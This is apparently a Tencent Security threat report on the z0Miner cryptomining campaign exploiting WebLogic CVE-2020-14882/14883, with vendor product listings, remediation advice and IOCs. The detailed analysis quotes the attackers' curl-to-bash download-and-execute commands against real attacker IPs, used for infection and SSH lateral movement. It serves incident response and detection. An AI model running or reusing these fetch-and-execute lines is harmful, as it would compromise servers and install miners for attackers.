产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- HOT最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录

z0Miner挖矿木马利用Weblogic最新漏洞入侵,腾讯主机安全(云镜)极速捕捉
2020-11-03 11:29:43
一、背景
腾讯主机安全(云镜)于2020.11.02日捕获到挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的攻击行动。该团伙通过批量扫描云服务器发现具有Weblogic漏洞的机器,发送精心构造的数据包进行攻击。之后执行远程命令下载shell脚本z0.txt运行,再利用该shell脚本植入门罗币挖矿木马、挖矿任务本地持久化,以及通过爆破SSH横向移动。根据该团伙控制的算力推算,已有大约5000台服务器受害。
由于Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)10月21日才被官方公布,有许多企业未来得及修复,同时该漏洞的补丁存在被绕过的风险。因此该挖矿木马可能对云主机造成较大威胁。
腾讯安全建议企业检查服务器上是否存在文件/tmp/javax/ssd2,检查crontab定时任务中是否存在可疑下载命令,删除挖矿木马文件和相关任务,检查Weblogic是否属于受影响版本并及时采取修复措施。
腾讯安全主机安全(云镜)、云防火墙、漏洞扫描系统、腾讯高级威胁检测系统(御界)均于10月28日升级,支持对该漏洞以及随后的补丁绕过风险进行检测和拦截。Oracle也于11月2日发布新更新,以解决CVE-2020-14882补丁被绕过的风险。腾讯安全专家建议用户尽快将Weblogic组件升级到最新版本。
腾讯安全系列产品应对z0Miner挖矿木马家族的响应清单如下:
应用 场景 |
安全产品 |
解决方案 |
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)z0Miner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
腾讯T-Sec 高级威胁追溯系统 |
1)z0Miner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
云原生安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1)已支持识别检测z0Miner挖矿木马关联的IOCs; 2)已支持检测和拦截Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
有关云防火墙的更多信息,可参考: |
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
1)已支持查杀z0Miner相关木马程序; 2)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
1)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
二、详细分析
10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中多个Weblogic组件相关高危漏洞引起业界高度关注。未经授权的攻击者可以绕过WebLogic后台登录等限制,直接远程利用反序列化漏洞,从而接管WebLogic服务器,风险极大。
10月28日,腾讯安全团队关注到互联网上已出现CVE-2020-14882和CVE-2020-14883两个高危漏洞POC(验证代码),未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求,利用该漏洞在受到攻击的WebLogic Server上执行任意代码。漏洞影响Oracle WebLogic Server的多个版本:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
11月02日腾讯云捕获到挖矿木马z0Miner利用CVE-2020-14882的攻击行为。攻击者精心构造具有CVE-2020-14882漏洞利用代码的数据包后,通过210.108.70.119向目标服务器发送请求。
漏洞攻击成功后在Payload中执行远程代码:
1.curl -fsSL http[:]//218.61.5.109/errors/z0.txt -o /tmp/solr
2.bash /tmp/solr
该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。
然后安装crontab定时任务进行持久化,定期下载木马https[:]//pastebin.com/raw/kkMGTEB4以及shell脚本https[:]//pastebin.com/raw/kkMGTEB4到失陷主机上运行,目前该URL返回数据为“exit”,可能在后续攻击中添加恶意代码。
通过SSH远程登陆已经认证过的机器进行横向移动,并在感染后执行远程命令:
curl -fsSL http[:]//189.7.105.47:8181/examples/jsp/z0.txt | sh
最后下载门罗币挖矿木马javae.exe保存至/tmp/javax/ssd2,通过脚本config.sh启动挖矿。
挖矿木马采用开源挖矿程序XMRig编译,挖矿使用钱包
43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY。
由于该木马刚刚上线,目前挖矿获得收益只有0.1个XMR,但根据其算力133 KH/s推算其已控制约5000台服务器进行挖矿。
IOCs
IP
222.108.2.20
218.61.5.109
189.7.105.47
210.108.70.119
Md5
javae.exe 373b018bef17e04d8ff29472390403f9
z0.txt 48072a4ad46bf20ddd6fdc6a19155c78
z0.txt 067a531e8580fe318ebff0b4038fbe6b
config.sh 5020b71e9cd1144c57f39c9d4072201b
URL
http[:]//222.108.2.20/about/javae.exe
http[:]//218.61.5.109/errors/z0.txt
http[:]//218.61.5.109/errors/config.sh
http[:]//189.7.105.47:8181/examples/jsp/config.json
http[:]//189.7.105.47:8181/examples/jsp/config.sh
http[:]//189.7.105.47:8181/examples/jsp/z0.txt
https[:]//pastebin.com/raw/qKcPmSNp
https[:]//pastebin.com/raw/kkMGTEB4
钱包:
43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY
参考链接:
https://mp.weixin.qq.com/s/LIjO2St8PdvXm3lS5wsJPQ
https://mp.weixin.qq.com/s/6qsjUMJaUpUQHZYdsB3Ntw
在线客服
方案咨询
合作伙伴